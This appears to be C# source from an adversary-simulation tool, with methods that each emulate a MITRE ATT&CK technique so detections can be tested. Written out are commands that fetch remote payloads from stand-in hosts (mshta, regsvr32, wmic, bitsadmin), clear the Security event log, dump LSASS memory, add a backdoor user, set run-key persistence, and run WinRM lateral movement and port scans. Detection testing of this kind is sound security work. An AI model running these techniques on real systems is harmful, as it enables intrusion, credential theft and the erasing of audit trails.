public static void Rundll32(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.011"); try { string file = @"C:\Windows\twain_64.dll"; ExecutionHelper.StartProcess("", String.Format("rundll32 \"{0}\"", file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void ExecutePowershell(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1086"); try { string encodedPwd = "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA=="; ExecutionHelper.StartProcess("", String.Format("powershell.exe -enc {0}", encodedPwd), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void SystemServiceDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1007"); try { ExecutionHelper.StartProcess("", "net start", logger); ExecutionHelper.StartProcess("", "tasklist /svc", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void SystemUserDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1033"); try { ExecutionHelper.StartProcess("", "whoami", logger); ExecutionHelper.StartProcess("", "query user", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void InstallUtil(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.004"); try { string file = @"C:\Windows\Temp\XKNqbpzl.exe"; ExecutionHelper.StartProcess("", String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfiles /LogToConsole=alse /U {0}", file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void DomainAccountDiscoveryLdap(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1087.002"); logger.TimestampInfo("Using LDAP to execute this technique"); try { DiscoveryHelper.ListUsersLdap(logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void Csmtp(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.003"); try { string file = @"C:\Users\Administrator\AppData\Local\Temp\XKNqbpzl.txt"; ExecutionHelper.StartProcess("", String.Format("cmstp /s /ns {0}", file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void ClearSecurityEventLogCmd(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1070.001"); logger.TimestampInfo("Using the command line to execute the technique"); try { ExecutionHelper.StartProcess("", "wevtutil.exe cl Security", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void XlScriptProcessing(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1220"); try { string url = "http://webserver/payload.xsl"; ExecutionHelper.StartProcess("", String.Format("wmic os get /FORMAT:\"{0}\"", url), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void Mshta(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.005"); try { string url = "http://webserver/payload.hta"; ExecutionHelper.StartProcess("", String.Format("mshta {0}", url), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void FileAndDirectoryDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1083"); try { ExecutionHelper.StartProcess("", @"dir c:\ >> %temp%\download", logger); ExecutionHelper.StartProcess("", @"dir C:\Users\ >> %temp%\download", logger, true); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void CreateLocalAccountApi(string log, bool cleanup) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1136.001"); logger.TimestampInfo("Using the Win32 API NetUserAdd function to execute the technique"); try { PersistenceHelper.CreateUserApi("haxor", logger, cleanup); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void NetworkServiceDiscovery(int nhost, int tsleep, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1046"); logger.TimestampInfo("Using the System.Net.Sockets .NET namespace to execute this technique"); try { var rand = new Random(); int computertype = rand.Next(1, 6); List <Task> tasklist = new List <Task>(); List <Computer> targetcomputers = Lib.Targets.GetHostTargets(computertype, nhost, logger); logger.TimestampInfo(String.Format("Obtained {0} target computers for the scan", targetcomputers.Count)); if (tsleep > 0) { logger.TimestampInfo(String.Format("Sleeping {0} seconds between each network scan", tsleep)); } foreach (Computer computer in targetcomputers) { if (!computer.Fqdn.ToUpper().Contains(Environment.MachineName.ToUpper())) { Computer temp = computer; TimeSpan interval = TimeSpan.FromSeconds(5); tasklist.Add(Task.Factory.StartNew(() => { logger.TimestampInfo(String.Format("Starting port scan against {0} ({1})", temp.ComputerName, temp.IPv4)); DiscoveryHelper.PortScan(temp, interval); })); if (tsleep > 0) { Thread.Sleep(tsleep * 1000); } } } Task.WaitAll(tasklist.ToArray()); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void WinRmCodeExec(int nhost, int tsleep, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1021.006"); logger.TimestampInfo("Using the System.Management.Automation .NET namespace to execute this technique"); try { var rand = new Random(); int computertype = rand.Next(1, 6); logger.TimestampInfo(String.Format("Querying LDAP for random targets...")); List <Computer> targethosts = Lib.Targets.GetHostTargets(computertype, nhost); logger.TimestampInfo(String.Format("Obtained {0} target computers", targethosts.Count)); List <Task> tasklist = new List <Task>(); //Console.WriteLine("[*] Starting WinRM Based Lateral Movement attack from {0} running as {1}", Environment.MachineName, WindowsIdentity.GetCurrent().Name); if (tsleep > 0) { logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", tsleep)); } foreach (Computer computer in targethosts) { Computer temp = computer; if (!computer.Fqdn.ToUpper().Contains(Environment.MachineName.ToUpper())) { tasklist.Add(Task.Factory.StartNew(() => { LateralMovementHelper.WinRMCodeExecution(temp, "powershell.exe", logger); })); if (tsleep > 0) { Thread.Sleep(tsleep * 1000); } } } Task.WaitAll(tasklist.ToArray()); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void SystemNetworkConnectionsDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1049"); try { ExecutionHelper.StartProcess("", "netstat", logger); ExecutionHelper.StartProcess("", "net use", logger); ExecutionHelper.StartProcess("", "net session", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void DomainAccountDiscoveryCmd(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1087.002"); logger.TimestampInfo("Using the command line to execute the technique"); try { ExecutionHelper.StartProcess("", "net user /domain", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void CreateWindowsServiceApi(string log, bool cleanup) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1543.003"); logger.TimestampInfo("Using the Win32 API CreateService function to execute the technique"); try { PersistenceHelper.CreateServiceApi(log, logger, cleanup); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void CreateRegistryRunKeyNET(string log, bool cleanup) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1547.001"); logger.TimestampInfo("Using the Microsoft.Win32 .NET namespace to execute the technique"); try { PersistenceHelper.RegistryRunKey(logger, cleanup); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void BitsJobs(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1197"); try { string url = "http://web.evil/sc.exe"; string file = @"C:\Windows\Temp\winword.exe"; ExecutionHelper.StartProcess("", String.Format("bitsadmin /transfer job /download /priority high {0} {1}", url, file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void RegsvcsRegasm(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.009"); try { string file = @"winword.dll"; ExecutionHelper.StartProcess("", String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U {0}", file), logger); ExecutionHelper.StartProcess("", String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U {0}", file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void ClearSecurityEventLogCmd(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1070"); //logger.TimestampInfo(String.Format("Starting T1070 Simulation on {0}", Environment.MachineName)); //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id)); try { ExecutionHelper.StartProcess("", "wevtutil.exe cl Security", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void DeobfuscateDecode(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1140"); try { string encoded = "encodedb64.txt"; string decoded = "decoded.exe"; ExecutionHelper.StartProcess("", String.Format("certutil -decode {0} {1}", encoded, decoded), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void Regsvr32(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.010"); try { string url = @"http://malicious.domain:8080/payload.sct"; string dll = "scrobj.dll"; ExecutionHelper.StartProcess("", String.Format("regsvr32.exe /u /n /s /i:{0} {1}", url, dll), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void ServiceExecution(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1569.002"); try { ExecutionHelper.StartProcessApi("", "net start UpdaterService", logger); ExecutionHelper.StartProcessApi("", "sc start UpdaterService", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void CreateAccountApi(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1136"); //logger.TimestampInfo(String.Format("Starting T1136 Simulation on {0}", Environment.MachineName)); //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id)); try { PersistenceHelper.CreateUser("haxor", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void ExecutePowershellCmd(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1059.001"); logger.TimestampInfo("Using the command line to execute the technique"); try { string encodedPwd = "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA=="; ExecutionHelper.StartProcessApi("", String.Format("powershell.exe -enc {0}", encodedPwd), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void JScript(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1059.007"); try { string file = "invoice0420.js"; ExecutionHelper.StartProcessApi("", String.Format("wscript.exe {0}", file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void NetworkServiceDiscovery(int computertype, int nhost, int sleep, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1046"); //logger.TimestampInfo(String.Format("Starting T1046 Simulation on {0}", Environment.MachineName)); //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id)); try { List <Task> tasklist = new List <Task>(); List <Computer> targetcomputers = Lib.Targets.GetHostTargets(computertype, nhost); logger.TimestampInfo(String.Format("Obtained {0} target computers for the scan", targetcomputers.Count)); //Console.WriteLine("[*] Starting Network Discovery from {0} ", Environment.MachineName); if (sleep > 0) { Console.WriteLine("[*] Sleeping {0} seconds between each scan", sleep); } foreach (Computer computer in targetcomputers) { if (!computer.Fqdn.ToUpper().Contains(Environment.MachineName.ToUpper())) { Computer temp = computer; TimeSpan interval = TimeSpan.FromSeconds(5); tasklist.Add(Task.Factory.StartNew(() => { logger.TimestampInfo(String.Format("Starting port scan against {0} ({1})", temp.ComputerName, temp.IPv4)); DiscoveryHelper.PortScan(temp, interval); })); if (sleep > 0) { Thread.Sleep(sleep * 1000); } } } Task.WaitAll(tasklist.ToArray()); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void Lsass(string log, int type = 0) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1003"); //logger.TimestampInfo(String.Format("Starting T1003 Simulation on {0}", Environment.MachineName)); //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id)); try { CredAccessHelper.LsassMemoryDump(logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void LocalGroups(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1069.001"); logger.TimestampInfo("Using the command line to execute the technique"); try { ExecutionHelper.StartProcess("", "net localgroup", logger); ExecutionHelper.StartProcess("", "net localgroup \"Administrators\"", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }